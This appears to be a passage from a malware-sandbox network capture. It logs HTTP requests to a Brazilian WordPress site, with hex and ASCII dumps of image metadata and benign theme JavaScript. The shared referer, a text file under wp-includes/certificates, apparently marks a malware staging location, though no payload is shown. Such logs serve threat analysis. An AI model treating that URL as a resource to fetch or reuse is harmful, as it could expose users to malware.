02 02 01 02 04 04 03 04 05 06 07 07 06 05 35 01 00 02 11 03 21 31 12 04 41 51 61 71 22 13 05 32 81 91 14 a1 b1 42 23 c1 52 d1 f0 33 24 62 e1 72 82 92 43 53 15 63 73 34 f1 25 06 16 a2 b2 83 07 26 35 c2 d2 44 93 54 a3 17 64 45 55 36 74 65 e2 f2 b3 84 c3 d3 75 e3 f3 46 94 a4 85 b4 95 c4 d4 e4 f4 a5 b5 c5 d5 e5 f5 56 66 76 86 96 a6 b6 c6 d6 e6 f6 27 37 47 57 67 77 87 97 a7 b7 c7 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 f2 d0 1b 06 66 7b 42 50 13 ca 65 60 2d 54 24 92 52 8a 92 55 b0 87 07 10 dd 24 13 e2 3e 48 b4 3e a6 89 77 b9 d3 01 9d b8 fa 45 ca b4 a2 d2 fa 98 e0 f7 82 63 80 d8 1f f5 41 c9 20 87 a2 e9 ce c3 a1 8c c9 77 e6 38 1b 76 92 1d b4 7f a3 a9 e6 bd de ff 00 e5 2d da fe b7 f4 ed d4 0d 8e 63 43 40 75 61 bb 98 09 fa 5f a4 30 ff 00 d1 ae 1a cc d6 ba 0b 77 82 01 d1 c4 1d 4f c3 67 f9 c9 1c c2 f0 0d 92 e7 31 a1 ad 92 48 8f 99 f6 a2 24 b0 c2 fa
                                        Data Ascii: ExifMM*bj(1r2i''Adobe Photoshop CS5 Windows2014:09:09 11:29:49~&(.LHHAdobe_CMAdobedS"?3!1AQa"q2B#$Rb34rC%Scs5&DTdEt6UeuF'Vfv7GWgw5!1AQaq"2B#R3$brCScs4%&5DTdEU6teuFVfv'7GWgw?f{BPe`-T$RU$>H>wEcA w8v-cC@ua_0wOg1H$
                                        Aug 16, 2022 10:49:03.883511066 CEST1457INData Raw: 3e 83 6e 57 d5 be b5 53 68 bc 34 ef 90 d9 d1 cd 33 fe 0d ff 00 49 9f f5 0b 94 eb ff 00 55 32 3a 60 39 38 e4 e5 60 ce b6 01 ee 64 fe 6d d1 ff 00 56 b3 71 b2 cd 4f 6b e3 70 04 12 c3 20 18 fe af bb fc d5 da 74 5e bf d3 c1 8a ed b2 82 41 9a af db 6b
                                        Data Ascii: >nWSh43IU2:`98`dmVqOkp t^Ak\?)S,fPou]/8TzDd1&{k-PO3(X@N}RV0uR4GdiSmW=G*[T@Fs<P9<+KxKiFlRN44N
                                        Aug 16, 2022 10:49:03.883539915 CEST1458INData Raw: 89 73 58 d6 19 d0 b2 40 92 67 45 27 fa 5e 91 b1 b6 4b b4 68 0e 00 18 db 27 d8 dd ff 00 45 de c6 59 b9 09 95 ba c2 43 01 3b 41 73 88 13 0d 1f 49 ee 85 07 19 3f 0d 02 04 f6 4a a4 94 a5 34 a4 95 95 32 07 9f c5 22 64 cf 1a f6 51 52 de 36 86 c0 e6 77
                                        Data Ascii: sX@gE'^Kh'EYC;AsI?J42"dQR6ww'L0u#nuD;i-nUNi`32\7vcavtl+K}i7PP}Qs7=%~eTfUt#cAok~df;3Y{kT
                                        Aug 16, 2022 10:49:03.883568048 CEST1460INData Raw: 54 00 00 00 01 00 00 00 38 42 49 4d 04 3b 00 00 00 00 01 b2 00 00 00 10 00 00 00 01 00 00 00 00 00 12 70 72 69 6e 74 4f 75 74 70 75 74 4f 70 74 69 6f 6e 73 00 00 00 12 00 00 00 00 43 70 74 6e 62 6f 6f 6c 00 00 00 00 00 43 6c 62 72 62 6f 6f 6c 00
                                        Data Ascii: T8BIM;printOutputOptionsCptnboolClbrboolRgsMboolCrnCboolCntCboolLblsboolNgtvboolEmlDboolIntrboolBckgObjcRGBCRd doub@oGrn doub@o
                                        Aug 16, 2022 10:49:03.883599997 CEST1461INData Raw: 00 54 6f 70 20 6c 6f 6e 67 00 00 00 00 00 00 00 00 4c 65 66 74 6c 6f 6e 67 00 00 00 00 00 00 00 00 42 74 6f 6d 6c 6f 6e 67 00 00 04 7e 00 00 00 00 52 67 68 74 6c 6f 6e 67 00 00 08 a0 00 00 00 03 75 72 6c 54 45 58 54 00 00 00 01 00 00 00 00 00 00
                                        Data Ascii: Top longLeftlongBtomlong~RghtlongurlTEXTnullTEXTMsgeTEXTaltTagTEXTcellTextIsHTMLboolcellTextTEXThorzAlignenumESliceHorzAligndefaultvertAlignenum
                                        Aug 16, 2022 10:49:03.883630991 CEST1463INData Raw: 16 d5 d8 53 6d 57 3d 12 04 47 2a 0e aa 12 a5 5b 54 b6 13 40 46 73 3c 94 0b 50 a4 82 ff 00 ff d0 f2 e4 a1 39 11 ce 89 08 3c 2b 4b 16 84 8a 78 4b 69 46 95 6c 52 82 9e 07 90 4e d6 92 0b 84 34 34 4e bd f5 ff 00 aa 42 93 6c 61 17 65 7e 98 2d 27 78 9d
                                        Data Ascii: SmW=G*[T@Fs<P9<+KxKiFlRN44NBlae~-'x10[\nJv16,AkRaNAhZk{~{XH|:6Ctnv=N/NE'tN`V^we.ug>*
                                        Aug 16, 2022 10:49:03.883660078 CEST1464INData Raw: a7 73 1c 7f 37 de e7 db fa 3d ec ff 00 83 fd cb 25 d3 7e b4 65 54 f1 66 55 c2 d2 e0 09 74 82 e0 23 63 41 6f e6 ed 6b 7f 9b ff 00 06 b0 7e ad 64 16 66 9c 3b 33 ab c0 c3 be 59 7b ef 6b 9f 54 e8 fa f7 d5 35 b9 9f a4 63 3f 4b ea 57 e9 ae cb ad 59 d1
                                        Data Ascii: s7=%~eTfUt#cAok~df;3Y{kT5c?KWYzuo7WN{\UXMVH;h}K_DH{v9ncGU/lp.pZ=\9tRj8kA--p~glbW-7v{Y_/VqcVw
                                        Aug 16, 2022 10:49:03.883692026 CEST1466INData Raw: 2d 6e 73 23 22 3e 20 3c 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 20 72 64 66 3a 61 62 6f 75 74 3d 22 22 20 78 6d 6c 6e 73 3a 78 6d 70 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 22 20 78 6d 6c 6e
                                        Data Ascii: -ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xml
                                        Aug 16, 2022 10:49:03.883723021 CEST1467INData Raw: 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                        Data Ascii: DF> </x:xmpmeta>
                                        Aug 16, 2022 10:49:03.883754969 CEST1468INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                        Data Ascii:
                                        Aug 16, 2022 10:49:04.111326933 CEST1479INData Raw: 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 64 65 73 63 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f 2f 77 77 77 2e
                                        Data Ascii: XYZ $descIEC http://www.iec.chIEC http://www.iec.chdesc.IEC 61966-2.1 Default RGB colour space - sRGB.IEC 61966-2.1 Default RGB colour space -
                                        Aug 16, 2022 10:49:05.486282110 CEST2414OUTGET /wp-content/plugins/cherry-parallax/js/cherry.parallax.js?ver=1.0.0 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:49:05.714113951 CEST2419INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:17 GMT
                                        Server: Apache
                                        ETag: "a4f8b0-2f7e-58592c72eb640"
                                        Last-Modified: Tue, 02 Apr 2019 21:25:37 GMT
                                        Content-Length: 12158
                                        Content-Type: application/x-javascript
                                        X-Pad: avoid browser bug
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 23795444 21534532
                                        Age: 48
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 0a 20 20 20 20 0a 20 20 20 20 70 61 72 61 6c 6c 61 78 5f 62 6f 78 20 3d 20 24 28 27 73 65 63 74 69 6f 6e 2e 70 61 72 61 6c 6c 61 78 2d 62 6f 78 27 29 3b 0a 20 20 20 20 69 66 28 70 61 72 61 6c 6c 61 78 5f 62 6f 78 2e 6c 65 6e 67 74 68 20 3e 20 30 29 7b 0a 20 20 20 20 20 20 20 20 50 61 72 61 6c 6c 61 78 42 6f 78 28 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 50 61 72 61 6c 6c 61 78 42 6f 78 28 29 0a 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 77 69 6e 64 6f 77 53 65 6c 65 63 74 6f 72 20 3d 20 24 28 77 69 6e 64 6f 77 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 53 65 6c 65 63 74 6f 72 20 3d 20 24 28 64 6f 63 75 6d 65 6e 74 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 57 69 64 74 68 20 3d 20 64 6f 63 75 6d 65 6e 74 53 65 6c 65 63 74 6f 72 2e 77 69 64 74 68 28 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 48 65 69 67 68 74 20 3d 20 77 69 6e 64 6f 77 53 65 6c 65 63 74 6f 72 2e 6f 75 74 65 72 48 65 69 67 68 74 28 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 74 65 4d 6f 64 65 20 3d 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 65 56 65 72 73 69 6f 6e 20 3d 20 67 65 74 49 6e 74 65 72 6e 65 74 45 78 70 6c 6f 72 65 72 56 65 72 73 69 6f 6e 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 76 61 72 20 64 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 69 66 28 21 64 65 76 69 63 65 2e 6d 6f 62 69 6c 65 28 29 20 26 26 20 21 64 65 76 69 63 65 2e 74 61 62 6c 65 74 28 29 29 7b 0a 09 09 09 6c 69 74 65 4d 6f 64 65 20 3d 20 66 61 6c 73 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 65 56 65 72 73 69 6f 6e 20 21 3d 2d 31 20 26 26 20 69 65 56 65 72 73 69 6f 6e 20 3c 20 39 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 74 65 4d 6f 64 65 20 3d 20 74 72 75 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 09 09 7d 65 6c 73 65 7b 0a 09 09 09 6c 69 74 65 4d 6f 64 65 20 3d 20 74 72 75 65 3b 0a 09 09 7d 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 70 61 72 61 6c 6c 61 78 5f 62 6f 78 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 70 61 72 61 6c 6c 61 78 42 6f 78 28 24 28 74 68 69 73 29 29 3b 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 70 61 72 61 6c 6c 61 78 42 6f 78 28 6f 62 6a 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 62 6a 5f 62 67 20 3d 20 6f 62 6a 2e 66 69 6e 64 28 27 2e 70 61 72 61
                                        Data Ascii: jQuery(document).ready(function($){ parallax_box = $('section.parallax-box'); if(parallax_box.length > 0){ ParallaxBox(); } function ParallaxBox() { var windowSelector = $(window), documentSelector = $(document), documentWidth = documentSelector.width(), windowHeight = windowSelector.outerHeight(), liteMode = false, ieVersion = getInternetExplorerVersion(); var ds = document.documentElement; if(!device.mobile() && !device.tablet()){liteMode = false; if (ieVersion !=-1 && ieVersion < 9){ liteMode = true; }}else{liteMode = true;} parallax_box.each(function() { parallaxBox($(this)); }); function parallaxBox(obj){ var obj_bg = obj.find('.para
                                        Aug 16, 2022 10:49:05.718049049 CEST2432OUTGET /wp-content/themes/theme51253/js/custom-script.js?ver=1.0 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:49:05.945801973 CEST2449INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:18 GMT
                                        Server: Apache
                                        ETag: "a53a52-14d5-58592d7651a40"
                                        Last-Modified: Tue, 02 Apr 2019 21:30:09 GMT
                                        Content-Length: 5333
                                        Content-Type: application/x-javascript
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 23795445 21534536
                                        Age: 48
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 76 61 72 0a 09 09 77 69 6e 64 6f 77 53 65 6c 65 63 74 6f 72 20 3d 20 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 0a 09 3b 0a 0a 09 77 69 6e 64 6f 77 53 65 6c 65 63 74 6f 72 2e 72 65 73 69 7a 65 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 09 6a 51 75 65 72 79 28 27 2e 67 6d 61 70 5f 63 6f 6e 74 61 69 6e 65 72 27 29 2e 63 73 73 28 7b 20 27 77 69 64 74 68 27 3a 20 77 69 6e 64 6f 77 53 65 6c 65 63 74 6f 72 2e 77 69 64 74 68 28 29 2c 20 27 6c 65 66 74 27 3a 27 35 30 25 27 2c 20 27 6d 61 72 67 69 6e 2d 6c 65 66 74 27 3a 20 77 69 6e 64 6f 77 53 65 6c 65 63 74 6f 72 2e 77 69 64 74 68 28 29 2f 2d 32 20 7d 29 3b 0a 09 09 6a 51 75 65 72 79 28 27 2e 67 6d 61 70 5f 63 6f 6e 74 61 69 6e 65 72 32 27 29 2e 63 73 73 28 7b 20 27 77 69 64 74 68 27 3a 20 77 69 6e 64 6f 77 53 65 6c 65 63 74 6f 72 2e 77 69 64 74 68 28 29 2c 20 27 6c 65 66 74 27 3a 27 35 30 25 27 2c 20 27 6d 61 72 67 69 6e 2d 6c 65 66 74 27 3a 20 77 69 6e 64 6f 77 53 65 6c 65 63 74 6f 72 2e 77 69 64 74 68 28 29 2f 2d 32 20 7d 29 3b 0a 09 09 6a 51 75 65 72 79 28 27 2e 63 6f 6e 74 65 6e 74 5f 63 6f 6e 74 61 69 6e 65 72 31 27 29 2e 63 73 73 28 7b 20 27 77 69 64 74 68 27 3a 20 77 69 6e 64 6f 77 53 65 6c 65 63 74 6f 72 2e 77 69 64 74 68 28 29 2c 20 27 6c 65 66 74 27 3a 27 35 30 25 27 2c 20 27 6d 61 72 67 69 6e 2d 6c 65 66 74 27 3a 20 77 69 6e 64 6f 77 53 65 6c 65 63 74 6f 72 2e 77 69 64 74 68 28 29 2f 2d 32 20 7d 29 3b 0a 09 7d 29 2e 74 72 69 67 67 65 72 28 22 72 65 73 69 7a 65 22 29 3b 0a 0a 09 6a 51 75 65 72 79 28 27 2e 63 68 65 72 72 79 5f 6d 65 64 69 61 5f 70 61 72 61 6c 6c 61 78 5f 31 27 29 2e 66 61 64 65 54 6f 28 30 2c 20 30 29 3b 0a 09 0a 7d 29 0a 0a 24 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 76 61 72 0a 09 09 6d 65 6e 75 57 72 61 70 20 3d 20 24 28 27 2e 68 65 61 64 65 72 20 2e 6d 65 6e 75 5f 77 72 61 70 27 29 0a 09 2c 09 6f 66 66 73 65 74 41 72 72 61 79 20 3d 20 5b 5d 0a 09 2c 09 6f 66 66 73 65 74 56 61 6c 75 65 41 72 72 61 79 20 3d 20 5b 5d 0a 09 2c 09 5f 64 6f 63 75 6d 65 6e 74 20 3d 20 24 28 64 6f 63 75 6d 65 6e 74 29 0a 09 2c 09 63 75 72 72 48 61 73 68 20 3d 20 27 27 0a 09 2c 09 69 73 41 6e 69 6d 20 3d 20 66 61 6c 73 65 0a 09 2c 09 69 73 48 6f 6d 65 50 61 67 65 20 3d 20 24 28 27 62 6f 64 79 27 29 2e 68 61 73 43 6c 61 73 73 28 27 68 6f 6d 65 27 29 3f 20 74 72 75 65 3a 66 61 6c 73 65 0a 09 3b 0a 09 0a 09 2f 2f 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 4d 65 6e 75 20 6e 61 76 69 67 61 74 69 6f 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 09 24 28 27 23 74 6f 70 6e 61 76 20 3e 20 6c 69 27 2c 20 6d 65 6e 75 57 72 61 70 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 09 69 66 28 24 28 74 68 69 73 29 2e 68 61 73 43 6c 61 73 73 28 27 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 75 73 74 6f 6d 27 29 29 7b 0a 09 09 09 76
                                        Data Ascii: jQuery(document).ready(function(){varwindowSelector = jQuery(window);windowSelector.resize(function(){jQuery('.gmap_container').css({ 'width': windowSelector.width(), 'left':'50%', 'margin-left': windowSelector.width()/-2 });jQuery('.gmap_container2').css({ 'width': windowSelector.width(), 'left':'50%', 'margin-left': windowSelector.width()/-2 });jQuery('.content_container1').css({ 'width': windowSelector.width(), 'left':'50%', 'margin-left': windowSelector.width()/-2 });}).trigger("resize");jQuery('.cherry_media_parallax_1').fadeTo(0, 0);})$(function() {varmenuWrap = $('.header .menu_wrap'),offsetArray = [],offsetValueArray = [],_document = $(document),currHash = '',isAnim = false,isHomePage = $('body').hasClass('home')? true:false;//--------------------------- Menu navigation ---------------------------$('#topnav > li', menuWrap).each(function(){if($(this).hasClass('menu-item-type-custom')){v
                                        Aug 16, 2022 10:49:05.949084044 CEST2454OUTGET /wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:49:06.177118063 CEST2477INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:18 GMT
                                        Server: Apache
                                        ETag: "a53a5c-5e2-58592d7651a40"
                                        Last-Modified: Tue, 02 Apr 2019 21:30:09 GMT
                                        Content-Length: 1506
                                        Content-Type: application/x-javascript
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 23795446 18492602
                                        Age: 47
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: ef bb bf 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 0a 20 24 2e 66 6e 2e 73 63 72 6f 6c 6c 53 68 6f 77 54 69 6d 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 0a 20 20 20 20 76 61 72 20 67 65 74 4f 70 74 69 6f 6e 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 72 72 65 63 74 69 6f 6e 59 3a 20 31 30 30 0a 20 20 20 20 2c 20 20 20 6f 6e 53 68 6f 77 3a 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 0a 20 20 20 20 7d 0a 20 20 20 20 24 2e 65 78 74 65 6e 64 28 67 65 74 4f 70 74 69 6f 6e 2c 20 6f 29 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 5f 74 68 69 73 20 3d 20 24 28 74 68 69 73 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2c 74 6f 70 4f 66 66 73 65 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2c 77 69 6e 64 6f 77 48 65 69 67 68 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2c 5f 76 69 73 69 62 6c 65 3d 66 61 6c 73 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2c 5f 77 69 6e 3d 24 28 77 69 6e 64 6f 77 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2c 5f 64 6f 63 3d 24 28 64 6f 63 75 6d 65 6e 74 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 69 74 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 69 6e 69 74 28 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 54 6f 70 4f 66 66 73 65 74 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5f 74 68 69 73 2e 61 64 64 43 6c 61 73 73 28 27 68 69 64 65 5f 73 74 61 74 65 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 64 64 45 76 65 6e 74 48 61 6e 64 6c 65 72 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2f 2f 65 6e 64 20 69 6e 69 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 73 65 74 54 6f 70 4f 66 66 73 65 74 28 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 6f 70 4f 66 66 73 65 74 20 3d 20 5f 74 68 69 73 2e 6f 66 66 73 65 74 28 29 2e 74 6f 70 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 61 64 64 45 76 65 6e 74 48 61 6e 64 6c 65 72 28 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 27 73 63 72 6f 6c 6c 27 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 54 6f 70 4f 66 66 73 65 74 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 4c 69 73 74 65 6e 65 72 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 2e 74 72 69 67 67 65 72 28 27 73 63 72 6f 6c 6c 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 27 72 65 73 69 7a 65 27 2c 20 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 20 20
                                        Data Ascii: (function($){ $.fn.scrollShowTime=function(o){ var getOption = { correctionY: 100 , onShow: function(){} } $.extend(getOption, o); return this.each(function(){ var _this = $(this) ,topOffset ,windowHeight ,_visible=false ,_win=$(window) ,_doc=$(document) ; init(); function init(){ setTopOffset(); _this.addClass('hide_state'); addEventHandler(); }//end init function setTopOffset(){ topOffset = _this.offset().top; } function addEventHandler(){ $(window).on('scroll',function(){ setTopOffset(); positionListener(); }).trigger('scroll'); $(window).on('resize', function(){
                                        Aug 16, 2022 10:49:06.183506012 CEST2478OUTGET /wp-content/themes/CherryFramework/js/jquery.mobilemenu.js?ver=1.0 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:49:06.411715031 CEST2484INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:19 GMT
                                        Server: Apache
                                        ETag: "a53545-81a-58592d4a732c0"
                                        Last-Modified: Tue, 02 Apr 2019 21:29:23 GMT
                                        Content-Length: 2074
                                        Content-Type: application/x-javascript
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 23795447 18492604
                                        Age: 47
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 2f 2a 2a 0a 20 2a 20 6a 51 75 65 72 79 20 4d 6f 62 69 6c 65 20 4d 65 6e 75 0a 20 2a 20 54 75 72 6e 20 75 6e 6f 72 64 65 72 65 64 20 6c 69 73 74 20 6d 65 6e 75 20 69 6e 74 6f 20 64 72 6f 70 64 6f 77 6e 20 73 65 6c 65 63 74 20 6d 65 6e 75 0a 20 2a 20 76 65 72 73 69 6f 6e 20 31 2e 30 28 33 31 2d 4f 43 54 2d 32 30 31 31 29 0a 20 2a 0a 20 2a 20 42 75 69 6c 74 20 6f 6e 20 74 6f 70 20 6f 66 20 74 68 65 20 6a 51 75 65 72 79 20 6c 69 62 72 61 72 79 0a 20 2a 20 20 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 44 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 0a 20 2a 20 20 20 68 74 74 70 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 61 6d 62 6f 77 73 2f 6d 6f 62 69 6c 65 6d 65 6e 75 0a 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 0a 09 24 2e 66 6e 2e 6d 6f 62 69 6c 65 4d 65 6e 75 20 3d 20 66 75 6e 63 74 69 6f 6e 28 6f 70 74 69 6f 6e 73 29 20 7b 0a 09 09 76 61 72 20 64 65 66 61 75 6c 74 73 20 3d 20 7b 0a 09 09 09 09 64 65 66 61 75 6c 74 54 65 78 74 3a 20 27 4e 61 76 69 67 61 74 65 20 74 6f 2e 2e 2e 27 2c 0a 09 09 09 09 63 6c 61 73 73 4e 61 6d 65 3a 20 27 73 65 6c 65 63 74 2d 6d 65 6e 75 27 2c 0a 09 09 09 09 73 75 62 4d 65 6e 75 43 6c 61 73 73 3a 20 27 73 75 62 2d 6d 65 6e 75 27 2c 0a 09 09 09 09 73 75 62 4d 65 6e 75 44 61 73 68 3a 20 27 26 6e 64 61 73 68 3b 27 0a 09 09 09 09 7d 2c 0a 09 09 09 73 65 74 74 69 6e 67 73 20 3d 20 24 2e 65 78 74 65 6e 64 28 20 64 65 66 